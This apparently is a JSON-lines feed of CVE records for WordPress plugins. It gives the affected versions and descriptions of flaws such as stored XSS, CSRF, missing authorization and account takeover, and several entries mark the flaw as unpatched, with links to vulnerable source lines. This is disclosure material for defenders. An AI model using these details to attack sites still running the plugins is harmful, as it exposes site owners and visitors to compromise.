{"CVE_ID":"CVE-2024-6626","slug":"all-contact-form-integration-for-elementor","versionImpact":"2.9.9.9","description":"The EleForms \u2013 All In One Form Integration including DB for Elementor plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on several functions in all versions up to, and including, 2.9.9.9. This makes it possible for unauthenticated attackers to view form submissions.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eccea504-b8b9-46d3-b9fd-ae893528e521?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eccea504-b8b9-46d3-b9fd-ae893528e521?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-contact-form-integration-for-elementor\\\/trunk\\\/includes\\\/wp-ajax.php#L7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-contact-form-integration-for-elementor\\\/trunk\\\/includes\\\/wp-ajax.php#L7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-contact-form-integration-for-elementor\\\/trunk\\\/includes\\\/wp-ajax.php#L147\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-contact-form-integration-for-elementor\\\/trunk\\\/includes\\\/wp-ajax.php#L147\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-contact-form-integration-for-elementor\\\/trunk\\\/includes\\\/export_csv.php#L20\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-contact-form-integration-for-elementor\\\/trunk\\\/includes\\\/export_csv.php#L20\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10666","slug":"easy-twitter-feeds","versionImpact":"1.2.6","description":"The Easy Twitter Feed \u2013 Twitter feeds plugin for WP plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.2.6 via the [etf] shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from password protected, private, or draft posts that they should not have access to.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-twitter-feeds\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-twitter-feeds\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9cd3168-3261-4e36-8fbe-2058cd821937?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9cd3168-3261-4e36-8fbe-2058cd821937?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11928","slug":"ichart","versionImpact":"2.1.0","description":"The iChart \u2013 Easy Charts and Graphs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018width\u2019 parameter in all versions up to, and including, 2.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ichart\\\/tags\\\/2.1.0\\\/qcld_ichart_shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ichart\\\/tags\\\/2.1.0\\\/qcld_ichart_shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3204817\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3204817\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ichart\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ichart\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/100f6ccd-02d3-4b9e-8dd4-957a518c2a55?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/100f6ccd-02d3-4b9e-8dd4-957a518c2a55?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12591","slug":"magicpost","versionImpact":"1.2.1","description":"The MagicPost plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wb_share_social shortcode in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3209000%40magicpost&new=3209000%40magicpost&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3209000%40magicpost&new=3209000%40magicpost&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/magicpost\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/magicpost\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f81355fa-5b12-4b03-bd3d-f9e2cb734390?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f81355fa-5b12-4b03-bd3d-f9e2cb734390?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12542","slug":"linkid","versionImpact":"0.1.2","description":"The linkID plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check when including the 'phpinfo' function in all versions up to, and including, 0.1.2. This makes it possible for unauthenticated attackers to read configuration settings and predefined variables on the site's server. The plugin does not need to be activated for the vulnerability to be exploited.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/linkid\\\/trunk\\\/lib\\\/linkid\\\/linkid-sdk-php\\\/util\\\/index.php#L1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/linkid\\\/trunk\\\/lib\\\/linkid\\\/linkid-sdk-php\\\/util\\\/index.php#L1\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2fe5315-37b7-4009-b2e5-909e6b5ed1da?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2fe5315-37b7-4009-b2e5-909e6b5ed1da?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13734","slug":"card-elements-for-elementor","versionImpact":"1.2.6","description":"The Card Elements for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Profile Card widget in all versions up to, and including, 1.2.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3244795\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3244795\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/card-elements-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/card-elements-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.techeshta.com\\\/docs\\\/card-elements-for-elementor\\\/element-settings\\\/profile-card\\\/\",\"name\":\"https:\\\/\\\/www.techeshta.com\\\/docs\\\/card-elements-for-elementor\\\/element-settings\\\/profile-card\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7134bb24-11a1-41f9-ad34-b4527c22463c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7134bb24-11a1-41f9-ad34-b4527c22463c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0839","slug":"dzs-zoomsounds","versionImpact":"6.91","description":"The ZoomSounds plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 6.91 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/zoomsounds-wordpress-wave-audio-player-with-playlist\\\/6181433\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/zoomsounds-wordpress-wave-audio-player-with-playlist\\\/6181433\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49b76f5f-03f7-48bc-b848-9ab55d875639?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49b76f5f-03f7-48bc-b848-9ab55d875639?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3853","slug":"wpshop","versionImpact":"2.6.0","description":"The WPshop 2 \u2013 E-Commerce plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions 2.0.0 to 2.6.0 via the callback_generate_api_key() due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create valid API keys on behalf of other users.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpshop\\\/tags\\\/2.6.0\\\/modules\\\/api\\\/action\\\/class-api-action.php#L160\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpshop\\\/tags\\\/2.6.0\\\/modules\\\/api\\\/action\\\/class-api-action.php#L160\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/136d63c4-c985-413f-8d8b-b57e11d1d230?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/136d63c4-c985-413f-8d8b-b57e11d1d230?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1342","slug":"unusedcss","versionImpact":"1.7.1","description":"The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.7.1. This is due to missing or incorrect nonce validation on the ucss_connect function. This makes it possible for unauthenticated attackers to connect the site to a new license key via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c66894a-8d0f-4946-ae4d-bffd35f3ffb7\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c66894a-8d0f-4946-ae4d-bffd35f3ffb7\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0603","slug":"sloth-logo-customizer","versionImpact":"2.0.2","description":"The Sloth Logo Customizer WordPress plugin through 2.0.2 does not have CSRF check when updating its settings, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1c93ea8f-4e68-4da1-994e-35a5873278ba\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1c93ea8f-4e68-4da1-994e-35a5873278ba\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4380","slug":"wp-pinterest-automatic","versionImpact":"1.14.3.","description":"The Pinterest Automatic plugin for WordPress is vulnerable to authorization bypass due to missing capability checks on the 'wp_pinterest_automatic_parse_request' function and the 'process_form.php' script in versions up to, and including, 1.14.3. This makes it possible for unauthenticated attackers to update arbitrary options on a site that can be used to create new administrative user accounts or redirect unsuspecting site visitors.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4fdc902-4cfe-4116-a294-9a0fcb2de346?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4fdc902-4cfe-4116-a294-9a0fcb2de346?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/critical-vulnerability-fixed-in-wordpress-pinterest-automatic-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/critical-vulnerability-fixed-in-wordpress-pinterest-automatic-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ffd344fd-de2c-4f27-8932-41aa0a3c3d05\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ffd344fd-de2c-4f27-8932-41aa0a3c3d05\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-pinterest-automatic-pin-security-bypass-4-14-3\\\/\",\"name\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-pinterest-automatic-pin-security-bypass-4-14-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-49841","slug":"optin-forms","versionImpact":"1.3.3","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in FancyThemes Optin Forms \u2013 Simple List Building Plugin for WordPress allows Stored XSS.This issue affects Optin Forms \u2013 Simple List Building Plugin for WordPress: from n\/a through 1.3.3.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/optin-forms\\\/wordpress-optin-forms-plugin-1-3-3-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/optin-forms\\\/wordpress-optin-forms-plugin-1-3-3-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1779","slug":"admin-side-data-storage-for-contact-form-7","versionImpact":"1.1.1","description":"The Admin side data storage for Contact Form 7 plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the zt_dcfcf_change_status() function in all versions up to, and including, 1.1.1. This makes it possible for unauthenticated attackers to alter the message read status of messages.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52e4f79f-1148-4530-8d78-377a7365978a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52e4f79f-1148-4530-8d78-377a7365978a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/admin-side-data-storage-for-contact-form-7\\\/trunk\\\/inc\\\/admin\\\/class.ztdcfcf.admin.action.php#L213\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/admin-side-data-storage-for-contact-form-7\\\/trunk\\\/inc\\\/admin\\\/class.ztdcfcf.admin.action.php#L213\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4552","slug":"social-login-lite-for-woocommerce","versionImpact":"1.6.0","description":"The Social Login Lite For WooCommerce plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.6.0. This is due to insufficient verification on the user being supplied during the social login through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f91d6ad6-82fc-4507-90e2-aedfff26bac5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f91d6ad6-82fc-4507-90e2-aedfff26bac5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-login-lite-for-woocommerce\\\/tags\\\/1.6.0\\\/woocommerce_social_login.php#L499\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-login-lite-for-woocommerce\\\/tags\\\/1.6.0\\\/woocommerce_social_login.php#L499\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4450","slug":"ali2woo-lite","versionImpact":"3.3.5","description":"The AliExpress Dropshipping with AliNext Lite plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several functions in the ImportAjaxController.php file in all versions up to, and including, 3.3.5. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform several actions like importing and modifying products.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01836c2c-0976-493e-8b13-1c7c702d1d2c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01836c2c-0976-493e-8b13-1c7c702d1d2c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ali2woo-lite\\\/trunk\\\/includes\\\/classes\\\/controller\\\/ImportAjaxController.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ali2woo-lite\\\/trunk\\\/includes\\\/classes\\\/controller\\\/ImportAjaxController.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7690","slug":"dn-popup","versionImpact":"1.2.2","description":"The DN Popup WordPress plugin through 1.2.2 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1f941d51-1eaf-424a-95b8-ccaa3fdd339b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1f941d51-1eaf-424a-95b8-ccaa3fdd339b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4448","slug":"kaswara","versionImpact":"3.0.1","description":"The Kaswara Modern VC Addons plugin for WordPress is vulnerable to authorization bypass in versions up to, and including, 3.0.1 due to insufficient capability checking on various AJAX actions. This makes it possible for unauthenticated attackers to perform a wide variety of unauthorized actions such as importing data, uploading arbitrary files, deleting arbitrary files, and more.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bf76527-9a11-4755-992c-02fbc1a79bae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bf76527-9a11-4755-992c-02fbc1a79bae?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/kaswara-modern-visual-composer-addons\\\/19341477\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/kaswara-modern-visual-composer-addons\\\/19341477\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12515","slug":"masjidal","versionImpact":"1.8.8","description":"The Muslim Prayer Time-Salah\/Iqamah plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Masjid ID parameter in all versions up to, and including, 1.8.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/masjidal\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/masjidal\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e34b3df-ac18-4409-b8fe-b27c931f3aa3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e34b3df-ac18-4409-b8fe-b27c931f3aa3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12586","slug":"chalet-montagne-com-tools","versionImpact":"2.7.8","description":"The Chalet-Montagne.com Tools WordPress plugin through 2.7.8 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2ce05a44-762b-4aaf-b88a-92c830fd8ec4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2ce05a44-762b-4aaf-b88a-92c830fd8ec4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13776","slug":"dzs-zoomsounds","versionImpact":"6.91","description":"The ZoomSounds - WordPress Wave Audio Player with Playlist plugin for WordPress is vulnerable to unauthorized modification of data that can lead to a denial of service due to a missing capability check on the 'dzsap_delete_notice' AJAX action in all versions up to, and including, 6.91. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update option values to 'seen' on the WordPress site. This can be leveraged to update an option that would create an error on the site and deny service to legitimate users or be used to set some values to true such as registration. There are several other functions also vulnerable to missing authorization.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/zoomsounds-wordpress-wave-audio-player-with-playlist\\\/6181433\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/zoomsounds-wordpress-wave-audio-player-with-playlist\\\/6181433\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0c8e538b-7157-42d3-abee-8259c6715cd5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0c8e538b-7157-42d3-abee-8259c6715cd5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3852","slug":"wpshop","versionImpact":"2.6.0","description":"The WPshop 2 \u2013 E-Commerce plugin for WordPress is vulnerable to privilege escalation via account takeover in versions 2.0.0 to 2.6.0. This is due to the plugin not properly validating a user's identity prior to updating their details like email & password through the update() function. This makes it possible for authenticated attackers, with subscriber-level access and above, to change arbitrary user's passwords, including administrators, and leverage that to gain access to their account.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpshop\\\/tags\\\/2.6.0\\\/\\\/core\\\/external\\\/eo-framework\\\/modules\\\/wpeo-model\\\/class\\\/user.class.php#L132\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpshop\\\/tags\\\/2.6.0\\\/\\\/core\\\/external\\\/eo-framework\\\/modules\\\/wpeo-model\\\/class\\\/user.class.php#L132\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpshop\\\/tags\\\/2.6.0\\\/\\\/modules\\\/api\\\/action\\\/class-api-action.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpshop\\\/tags\\\/2.6.0\\\/\\\/modules\\\/api\\\/action\\\/class-api-action.php#L32\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpshop\\\/tags\\\/2.6.0\\\/core\\\/external\\\/eo-framework\\\/modules\\\/wpeo-model\\\/class\\\/rest.class.php#L41\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpshop\\\/tags\\\/2.6.0\\\/core\\\/external\\\/eo-framework\\\/modules\\\/wpeo-model\\\/class\\\/rest.class.php#L41\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96b8186c-dfe9-4137-b28d-cc09a25aa9ac?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96b8186c-dfe9-4137-b28d-cc09a25aa9ac?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4781","slug":"accordion-shortcodes","versionImpact":"2.4.2","description":"The Accordion Shortcodes WordPress plugin through 2.4.2 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a2803027-b822-4bf9-8d1d-6f538681af9d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a2803027-b822-4bf9-8d1d-6f538681af9d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1341","slug":"unusedcss","versionImpact":"1.7.1","description":"The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.7.1. This is due to missing or incorrect nonce validation on the ajax_deactivate function. This makes it possible for unauthenticated attackers to turn off caching via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d95b01c3-5db4-40ac-8787-0db58a9cc3a6\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d95b01c3-5db4-40ac-8787-0db58a9cc3a6\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
